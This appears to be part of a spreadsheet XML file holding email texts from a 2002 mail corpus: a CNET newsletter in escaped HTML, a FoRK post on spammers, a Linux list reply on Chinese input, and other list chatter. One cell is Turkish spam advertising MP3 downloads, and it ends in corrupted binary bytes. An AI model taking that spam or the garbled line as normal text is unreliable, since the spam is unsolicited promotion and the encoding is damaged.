 &lt;b&gt;Cable companies cracking down on Wi-Fi&lt;/b&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Broadband providers are cracking down on popular Wi-Fi networks, threatening to cut service to customers who set up the inexpensive wireless systems and allow others to freely tap into their Internet access.
 Time Warner Cable of New York City has given 10 customers less than a week to stop using their accounts to provide a wireless local area network available to anyone within 300 feet. The letters are just an initial volley; Time Warner expects to send additional letters, while AT&amp;T Broadband also is preparing similar letters for some of its customers.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 9, 2002, 4:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=c9-3OZLQpgkU3mw4fgjg0SxiPZvH6cR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;P&gt;
 &lt;a name="h2"&gt;&lt;b&gt;Apple's iPod comes to Linux&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Windows users have recently been given access to the popular Macintosh music player, iPod, and now Linux users may soon be able to take a bite out of Apple Computer's gadget. Last week, tex9, a small software-development company in San Francisco, began beta testing an iPod plug-in for its xtunes music player software, which is itself a Linux clone of Apple's iTunes. The plug-in will, tex9 promises, allow drag-and-drop access to iPod, which holds up to 10GB of music.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 9, 2002, 12:00 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=df-1kJhQLEFHE_SERofbQq-Kh1XhaZR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h3"&gt;&lt;b&gt;Talk of Dell printer move heats up&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Dell Computer appears to be moving toward selling its own printers.
 A pair of analyst reports issued Tuesday added to a torrent of recent speculation that the Round Rock, Texas-based PC maker's next move will be into the printer market. Dell has plunged into a number of new markets over the past few years.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 9, 2002, 12:30 PM PT&lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=f4-Y-XEQ0skGx03lD7uUJ5QddfWmTdR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;br&gt;
 &lt;a name="h4"&gt;&lt;b&gt;Microsoft eyes Visa users with Passport&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Microsoft hopes to extend its Passport online identification system into authorizing credit card payments.
 The software giant will strike a partnership Tuesday with security-software maker Arcot Systems, which builds online payment systems for merchants and for banks that issue Visa and MasterCard credit cards. Arcot makes the systems behind Visa's own Verified by Visa program as well as a similar program in development at MasterCard.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 8, 2002, 9:00 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=09-joDSIj88wYrwYd1LYSS7ZMgtY8cR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h5"&gt;&lt;b&gt;Judge OKs suit against Kazaa parent&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 A federal judge said Monday that record labels and film studios could expand an ongoing copyright lawsuit to include Sharman Networks, which distributes the popular Kazaa software.
 The Recording Industry Association of America (RIAA) and the Motion Picture Association of America (MPAA) sued three prominent file-swapping companies in October in Los Angeles federal court. The suit named Morpheus parent StreamCast Networks, Grokster and Kazaa BV, the Netherlands-based company that originally created the Kazaa software.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 9, 2002, 12:55 PM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=1e-JQuLI4jWHd57RCeqEsB8LE27qdRR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;a name="h6"&gt;&lt;b&gt;China wakes to new destiny&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Global slump prompts tech titans to tap the sleeping giant's manufacturing prowess and consumer market.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 9, 2002, 4:00 AM PT
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=33-vUjnINjXKjpwghvz6yClxb-7XsFR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;table width="100%" cellpadding=0 cellspacing=0 border=0&gt;&lt;tr&gt;&lt;td width="100%" valign=bottom&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#666666"&gt;&lt;b&gt;From our partners:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=1 alt=""&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=2 bgcolor="#666666"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=1 alt=""&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;b&gt;Another big charge for AOL?&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 It may again have billions of excess goodwill on its books, and a write-down won't go over well with already unhappy investors.
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 9, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=48-ggFbIdBsyRC-D3fXl_kj2ZBSJu4R" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;b&gt;Business needs to take the blinders off&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 Business Week
 &lt;/font&gt;&lt;br&gt;
 &lt;font size="-1"&gt;
 Today's corporate apologists are too much like the Marxists who reflexively defended Communism's old poster boy -- Stalin.&lt;/font&gt;&lt;br&gt;
 &lt;font size="-2"&gt;
 July 9, 2002
 &lt;/font&gt; | &lt;font size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=5d-JN-bIK0sjRJtwwOobvZm5yGKIaeR" &gt;
 &lt;b&gt;Read Full Story&lt;/b&gt;&lt;/a&gt;&lt;/font&gt; &lt;img src="http://home.cnet.com/i/ne/ds/right_arrow.gif" alt="" width="9" height="9" border="0"&gt;
 &lt;p&gt;
 &lt;table width="100%" cellpadding=0 cellspacing=0 border=0&gt;&lt;tr&gt;&lt;td width="100%" valign=bottom&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;&lt;font color="#666666"&gt;&lt;b&gt;Also from CNET:&lt;/b&gt;&lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;&lt;td colspan=2&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=1 alt=""&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan=2 bgcolor="#666666"&gt;&lt;img src="http://a.r.tv.com/cnet.1d/b.gif" width=1 height=1 alt=""&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;
 &lt;font face="arial, helvetica" size="-1"&gt;Real-time stock quotes from CNET News.com Investor.&lt;br&gt;30-day &lt;a href="http://clickthru.online.com/Click?q=72-R8PHIPUf0jrNqz0rqMtNXjoCKqyR" &gt;free trial&lt;/a&gt;!&lt;/font&gt;
         &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
         &lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- Video Report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width=12 bgcolor="#ffffff"&gt;&lt;img src="http://home.cnet.com/b.gif" width="12" height="1" border="0"&gt;&lt;/td&gt;
         &lt;td width=575 bgcolor="#ffffff"&gt;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href="http://clickthru.online.com/Click?q=88-ec5PQQKx6IEe4UY-rU358atSBb9R" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/pg/021502_pointcamera.jpg" width="85" height="110" border="0" alt="" /&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="5"&gt;&lt;img src="http://home.cnet.com/b.gif" height=1 width=5&gt;&lt;/td&gt;
 &lt;td width="100%"&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=9d-kkCWQv0umM4zedRuKLvd75wKZzuR" &gt;&lt;b&gt;Digicams for summer shutterbugs&lt;/b&gt;&lt;/a&gt;&lt;br /&gt;Going on vacation, or just headed to the beach? Indulge your summer snapshot habit with one of our picks.&lt;/font&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;tr&gt;&lt;td colspan="3"&gt;&lt;img src="http://home.cnet.com/b.gif" height=3 width=1&gt;&lt;br /&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=b2-M4pwQX0a3ZhfzqvjM2cmpxUCPusR" &gt;5-megapixel shoot-out&lt;/a&gt;&lt;br /&gt;
 &amp;#149; &lt;a href="http://clickthru.online.com/Click?q=c7-KG43QLPWxessB4vNWtUoF24wxeZR" &gt;Leica Digilux 1: street shooter"s digicam&lt;/a&gt;&lt;br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&lt;b&gt;Digital cameras&lt;/b&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="7" alt="" border="0" /&gt;&lt;br /&gt;
 1. &lt;a href="http://clickthru.online.com/Click?q=dc-40zzQ0Lr5OhlQXYBz6gEwTinhldR" &gt;Canon PowerShot G2&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 2. &lt;a href="http://clickthru.online.com/Click?q=f2-OZVTQUwWCeN3O_A0pvVdi5Z7edsR" &gt;Canon PowerShot S40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 3. &lt;a href="http://clickthru.online.com/Click?q=07-HqCzI5rq9TCgh8KiqzUbrvLkiDZR" &gt;Canon PowerShot S30&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 4. &lt;a href="http://clickthru.online.com/Click?q=1c-cs_iIFr43mNlgPjn9kgGa2oXqGdR" &gt;Canon PowerShot A40&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" alt="" border="0" /&gt;&lt;br /&gt;
 5. &lt;a href="http://clickthru.online.com/Click?q=31-V_YRIjMsD0vB7ayyLxjkqVAXXbcR" &gt;Nikon Coolpix 995&lt;/a&gt;&lt;br /&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="6" alt="" border="0" /&gt;&lt;br /&gt;
 &lt;img src="http://a.r.tv.com/cnet.1d/i/fd/yl_arrow.gif" width="13" height="13" border="0" alt="" align="absmiddle" /&gt; &lt;b&gt;&lt;a href="http://clickthru.online.com/Click?q=46-19zwInpDSNGQ8sta1cN0535V0YiR" &gt;See all most popular cameras&lt;/a&gt;&lt;/b&gt;&lt;br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&lt;font face="Arial, Helvetica" size="-1"&gt;&amp;nbsp;&lt;Br&gt;
         &lt;table cellpadding=0 cellspacing=0 border=0 width=560&gt;
                 &lt;tr&gt;
                         &lt;td rowspan=3 width=175&gt;&lt;img src="http://home.cnet.com/i/ne/ds/sub-vidreport.gif"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cellpadding=0 cellspacing=0 border=0 width=560&gt;
                 &lt;tr valign=top&gt;
                         &lt;td&gt;&lt;img src="http://news.cnet.com/i/ne/bb/2002/07/0708_netscape7.jpg" alt="" width="96" height="72" border="0"&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td&gt;&lt;font face="Arial, Helvetica" size="-1"&gt;
                         &lt;b&gt;&lt;font size="+0"&gt;&lt;a href="http://clickthru.online.com/Click?q=5b-5LOwIBKDUXrvYmoxCjjvDSwizzlR" &gt;Netscape 7: How does it stack up?&lt;/a&gt;&lt;/font&gt;&lt;/b&gt;&lt;br&gt;
 CNET Download.com's Rex Baldazo previews Netscape 7, a new open-source version of the browser that the company hopes will chip away at Microsoft's leading position with Internet Explorer.&lt;br&gt;
                         &lt;a href="http://clickthru.online.com/Click?q=70-3vnJIdp6VDyyOjYKns2asfI8Uk4R" &gt;&lt;img src="http://news.cnet.com/i/gl/vid-w.gif" width=24 height=18 border=0 hspace=3 align=top&gt;&lt;/a&gt; &lt;a href="http://clickthru.online.com/Click?q=85-2G2oQ7KQfSBryiQaf70SVbToBBuR" &gt;&lt;b&gt;Watch Video&lt;/b&gt;&lt;/a&gt;&lt;br&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &amp;nbsp;&lt;br&gt;
 &lt;/td&gt;
 &lt;td width=12 bgcolor="#ffffff"&gt;&lt;img src="http://home.cnet.com/b.gif" width="12" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
         &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
 &lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- /Video Report --&gt;
 &lt;!-- News by Section --&gt;
 &lt;table cellpadding=0 cellspacing=0 border=0 width=612&gt;
 &lt;tr valign=top&gt;
         &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
         &lt;td width=10 bgcolor="#ffcc00"&gt;&lt;img src="http://home.cnet.com/b.gif" width="10" height="1" border="0"&gt;&lt;/td&gt;
         &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;
         &lt;td width=587 bgcolor="#ffffff"&gt;
         &lt;font face="Arial, Helvetica" size="-1"&gt;&amp;nbsp;&lt;Br&gt;
         &lt;table cellpadding=0 cellspacing=0 border=0 width=572&gt;
                 &lt;tr&gt;
                         &lt;td rowspan=3 width=12&gt;&lt;img src="http://home.cnet.com/b.gif" width="12" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                         &lt;td rowspan=3 width=175&gt;&lt;img src="http://home.cnet.com/i/ne/ds/sub-bysection.gif" alt="" width="175" height="25" border="0"&gt;&lt;/td&gt;
                         &lt;td width=385&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="21" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                         &lt;td bgcolor="#cccccc"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;/tr&gt;
                 &lt;tr&gt;
                         &lt;td&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="3" border="0"&gt;&lt;br&gt;&lt;/td&gt;
                 &lt;/tr&gt;
         &lt;/table&gt;
         &lt;table width="572" cellpadding="0" cellspacing="0" border="0"&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Enterprise&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=9a-b6_GQTMBGY_mw61Figi7yr9FKgsR" &gt;
 Shares in chip gear fall on new fears&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=af--dB8QLpqkx4VuLSydDX7NdmUVSZR" &gt;
 Dell douses Lexmark speculation&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c5-8BcDQzOaF-FWAk_zSROUJEymxquR" &gt;
 Microsoft tests dressed up Web software&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;E-Business&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=da-dT8jQUPq_nEl9djbjsMVKpv3DxsR" &gt;
 Stocks edge lower after Bush speech&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ef-04uYQmkHvF0v1HKqBxDVAmoBamZR" &gt;
 Bush talks tough on corporate fraud&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=04-k9W0IFQXFQfKUsA98BbBL7kOi_dR" &gt;
 Vignette's forecast dips on demand woes&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Communications&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=19-BLe0I2rXOrYLMLlKMZ2Fz8IR7XcR" &gt;
 WorldCom: The clock is ticking&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=2e-eMTGIiK8vtN8WxMktQ3DlPfP8NRR" &gt;
 Deutsche Telekom up on CEO talks&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=43-coL5IBJAEmvf_rv9Z5VKc-3P0BlR" &gt;
 NTT DoCoMo tries new 3G twist&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                         &lt;b&gt;Media&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=58-mr2xIdJHwWFD9MHYjKHbtbXYzH4R" &gt;
 Vivendi units harmonize in digital deal&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=6d-e8plIDEIKwv_1pH7Bc1bJBykEmeR" &gt;
 AOL Time Warner secures new credit&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=82-P0EYQXK1SVsULUc6gJLkjCXMZHsR" &gt;
 Banks bail out Vivendi with loans&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
        &lt;/tr&gt;
         &lt;tr valign="top"&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;ul&gt;
                        &lt;b&gt;Personal Technology&lt;/b&gt;&lt;br&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=97-dlfYQ1M1UyTjJsQ3V0z6qjySJGZR" &gt;
 It ain't heavy; it's my laptop&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=ad-_4IAQzEB45rLNHcQhaIHsSzky0uR" &gt;
 Matsushita: Chip unit headed toward black&lt;/a&gt;
                         &lt;li&gt;&lt;a href="http://clickthru.online.com/Click?q=c2-oXxLQUEk7TCKoi9gVnxXFZcIuIsR" &gt;
 French game maker up on Sega rumors&lt;/a&gt;
                         &lt;/ul&gt;
                 &lt;/font&gt;
                 &lt;/td&gt;
                 &lt;td width="286"&gt;&lt;font face="arial, helvetica" size ="-1"&gt;
                         &lt;/font&gt;
                 &lt;/td&gt;
         &lt;/tr&gt;
         &lt;/table&gt;
 &lt;!-- END COPY FOR THE GUTS --&gt;
         &amp;nbsp;&lt;br&gt;
         &lt;/td&gt;
         &lt;td width=12 bgcolor="#ffffff"&gt;&lt;img src="http://home.cnet.com/b.gif" width="12" height="1" border="0"&gt;&lt;br&gt;&lt;/td&gt;
         &lt;td width=1 bgcolor="#000000"&gt;&lt;img src="http://home.cnet.com/b.gif" width="1" height="1" border="0"&gt;&lt;/td&gt;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href="http://clickthru.online.com/Click?q=d7-wk3ZQLWkVTpPDzlRmBekeVktk2ZR" &gt;&lt;img src="http://a.r.tv.com/cnet.1d/i/nl/ft.gif" width="375" height="18" border="0" alt="Sign up for more free newsletters from CNET!"&gt;&lt;/a&gt;&lt;p&gt;
 &lt;!-- subscription management --&gt;
 &lt;font face="ms sans serif, geneva" size="-2"&gt;
 The e-mail address for your subscription is&amp;nbsp;qqqqqqqqqq-cnet-newsletters@example.com&lt;br&gt;
 &lt;A NOTRACK HREF='http://clickthru.online.com/Click?q=ec-MHlXray63gwtHPxvVqBAYENOGKW9jRRR'&gt;Unsubscribe&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href='http://nl.com.com/servlet/url_login?email=qqqqqqqqqq-cnet-newsletters@example.com&amp;brand=cnet'&gt;Manage My Subscriptions&lt;/a&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=01-9oXDI2jHgOhG8rMvurMPGPxZ6RcR" &gt;FAQ&lt;/A&gt;&amp;nbsp;|&amp;nbsp;&lt;a href="http://clickthru.online.com/Click?q=16-T_cjI4cFV5ruiQADblRuaBDxRURR" &gt;Advertise&lt;/A&gt;&lt;p&gt;Please send any questions, comments, or concerns to&amp;nbsp;&lt;a href="mailto:dispatchfeedback@news.com"&gt;dispatchfeedback@news.com&lt;/A&gt;.&lt;br&gt;&lt;/font&gt;
 &lt;!-- /subscription management--&gt;
 &lt;/font&gt;&lt;img src="http://www.zdnet.com/b.gif"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href="http://clickthru.online.com/Click?q=2b-2FVYINzsBKYmzY1wzk0xBfd-8WFR" &gt;&lt;img src="http://www.cnet.com/i/dp/smrb.gif" width="37" height="37" border="0"&gt;&lt;/a&gt;&lt;/td&gt;
 &lt;td width="563" nowrap&gt;&lt;font face="arial, helvetica" size="-1"&gt;
 &lt;a href="http://clickthru.online.com/Click?q=41-qqJ1IEKImGNYE8fU5CfCkxHB0FrR" &gt;&lt;font color="#000000"&gt;Price comparisons&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=56-NwKYInns9YfTpcErctPQDwwaMCiR" &gt;&lt;font color="#000000"&gt;Product reviews&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=6b-8g5ZIHEcwxylgIK80ywQ-4d0P6lR" &gt;&lt;font color="#000000"&gt;Tech news&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=80-KTKvQQ0KilA5FaIoaDkjVsTLZ89R" &gt;&lt;font color="#000000"&gt;Downloads&lt;/font&gt;&lt;/a&gt; |
 &lt;a href="http://clickthru.online.com/Click?q=95-XdwrQvdJolMF9lor1yZeU_u_KnuR"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src="http://gserv-cnet.zdnet.com/clear/outbound.gif?APPID=2&amp;EMID=25136487&amp;NL=e433&amp;ISSUE=2002-07-09" height=1 width=1&gt;    &lt;/div&gt;&lt;/td&gt;&lt;/tr&gt;&lt;tr&gt;  &lt;td colspan=2&gt;&lt;font face=Arial, Helvetica, sans-serif size=2&gt;    &lt;/font&gt;&lt;/td&gt;&lt;/tr&gt;&lt;/table&gt;&lt;/td&gt;&lt;/tr&gt;
 &lt;/table&gt;
 &lt;!-- ### /footer ### --&gt;
 &lt;/body&gt;
 &lt;/html&gt;
 &lt;IMG HEIGHT=1 WIDTH=1 SRC="http://clickthru.online.com/Click?q=aa-gBae-hU-_tfD2LsnEUuZc5Hbw9RR"&gt;
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: [scoop] Muzik iste
</t>
  </si>
  <si>
    <t xml:space="preserve">JetMp3 Trkiye'de ilk kez uygulanan bir sistemi hayata geirdi.
 http://www.jetmp3.com
 Bu sistemle artk stediiniz MP3 leri ister tek tek isterseniz albmler halinde ve birka dakika iinde sanki disketten bilgisayarnza ykler gibi sratle indirebilirsiniz. Turk ve Yabanc albmler, klipler ve daha fazlas...
 11gb lik arivimize gz atmak iin tklayn: http://www.jetmp3.com
 ӆ+,_x007f_޵隊X'u%zӅ(W-0x+y)rxjبejoâ_x007f_- )]ا_x001b_m_x000c_ zܢo)_x001c_ ^ZIXX(z(֥bq_x0007_all.ǟ_x001e_ wXb?+^(d
</t>
  </si>
  <si>
    <t xml:space="preserve">Gary Murphy:
 &gt;How do you intend to take legal (and/or violent) action against people a 
 &gt;world away and in a culture you can barely understand let alone
 &gt;understand how to properly bribe? I'm not so hopeful this method can work 
 &gt;against aromatherapy viagra when we can't even track and convict murderous 
 &gt;Nigerian mafia, and they are blatant!
 Spammers fall into two categories. The more
 difficult case are those whose back-end business
 can be executed entirely in a foreign nation, such
 as the 419 spammers. And you're right: there's not
 much we can do about those, except filter them in
 various ways. But the vast majority of spammers
 have a back-end business that requires a native
 presence. Debt consolidation. Mortgages. Herbalife
 and other MLMs. Even porn sites require credit
 card transactions. That means the people responsible
 CAN be found.
 &gt;I don't know of any law that specifically /exempts/ them from lawsuits, 
 &gt;it's just that no one has yet succeeded in any important way.
 There have been some successful suits, but (a) it
 takes too much effort, and (b) the result isn't enough
 to deter the spammer. But you're talking about action
 constrained by law. In an anarchy, people act more
 directly, with less cost, and to more effect. Spammers
 very quickly would learn their lesson. Except for the
 ones who ply their scam in a foreign country.
 Of course, that's assuming there are ISPs and other
 infrastructure in an anarchy. Arguing about how things
 would work without the state involves a large degree
 of counterfactual reasoning.
 &gt;no lawmaker has ever been even a tenth the catalyst on improving the 
 &gt;quality of life in Britain and the western world as did central heating and 
 &gt;the invention of one A.J.Crapper.
 Hmm. I've lived most of my life in houses that did
 not have central heating, including my current abode.
 As to the crapper, it did not do nearly as much to
 improve waste management in cities as did the public
 sewers which it feeds, and the water lines that supply
 it. Without these, you would find that a chamber pot
 works just as well.
 _________________________________________________________________
 MSN Photos is the easiest way to share and print your photos: 
 http://photos.msn.com/support/worldwide.aspx
 http://xent.com/mailman/listinfo/fork
</t>
  </si>
  <si>
    <t xml:space="preserve">Subject: Headline - Navel gazing wins an Ig Nobel
</t>
  </si>
  <si>
    <t xml:space="preserve">Greetings,
 Carey wants you to know about a story on www.theage.com.au
 Personal Message:
 Ah the Ig Nobels, always worth a read :)  If only they had a cat-mood decipherer.  ^__^
 Navel gazing wins an Ig Nobel
 By Jay Lindsay &lt;br&gt;Boston
 October 05 2002
 URL: http://www.theage.com.au/articles/2002/10/04/1033538774048.html
</t>
  </si>
  <si>
    <t xml:space="preserve">Hi,
 fergal@esatclear.ie said:
 &gt; 7.3 seems to support Chinese input out of the box, it's got
 &gt; miniChinput and  some other stuff no documentation. I cannot get much
 &gt; sense from the  Chinese-HOWTO (it seems the HOWTOs no longer come with
 &gt; Redhat which sucks  somewhat, are they hidden on 1 of the disks or
 &gt; something?) and google is a  bit of a dead end too.
 &gt; Can anyone tell me what I should do? Thanks,
 How about xcin?
 http://xcin.linux.org.tw/
 This is an example of an XIM approach that Brian mentioned. hint shift-space 
 get you back to typing in english.
 The speed you can type at will be very dependent on how well you know the 
 input method and in some cases how well you know how to construct chinese 
 characters.
 I have seen people using electronic pen and tablet devices to just write the 
 characters in, though that was windows.
 ~Al
 -- 
 Expressed in this posting are my opinions.  They are in no way related
 to opinions held by my employer, Sun Microsystems.
 Statements on Sun products included here are not gospel and may
 be fiction rather than truth.
 -- 
 Irish Linux Users' Group: ilug@linux.ie
 http://www.linux.ie/mailman/listinfo/ilug for (un)subscription information.
 List maintainer: listmaster@linux.ie
</t>
  </si>
  <si>
    <t xml:space="preserve">Martin Adamson wrote:
 &gt; 
 &gt; Isn't it just basically a mixture of beaten egg and bacon (or pancetta, 
 &gt; really)? You mix in the raw egg to the cooked pasta and the heat of the pasta 
 &gt; cooks the egg. That's my understanding.
 &gt; 
 You're probably right, mine's just the same but with the cream added to the 
 eggs.  I guess I should try it without.  Actually looking on the internet for a 
 recipe I found this one from possibly one of the scariest people I've ever seen, 
 and he's a US Congressman:
 &lt;http://www.virtualcities.com/ons/me/gov/megvjb1.htm&gt;
 That's one of the worst non-smiles ever.
 Stew
 ps. Apologies if any of the list's Maine residents voted for this man, you won't 
 do it again once you've seen this pic.
 -- 
 Stewart Smith
 Scottish Microelectronics Centre, University of Edinburgh.
 http://www.ee.ed.ac.uk/~sxs/
 ------------------------ Yahoo! Groups Sponsor ---------------------~--&gt;
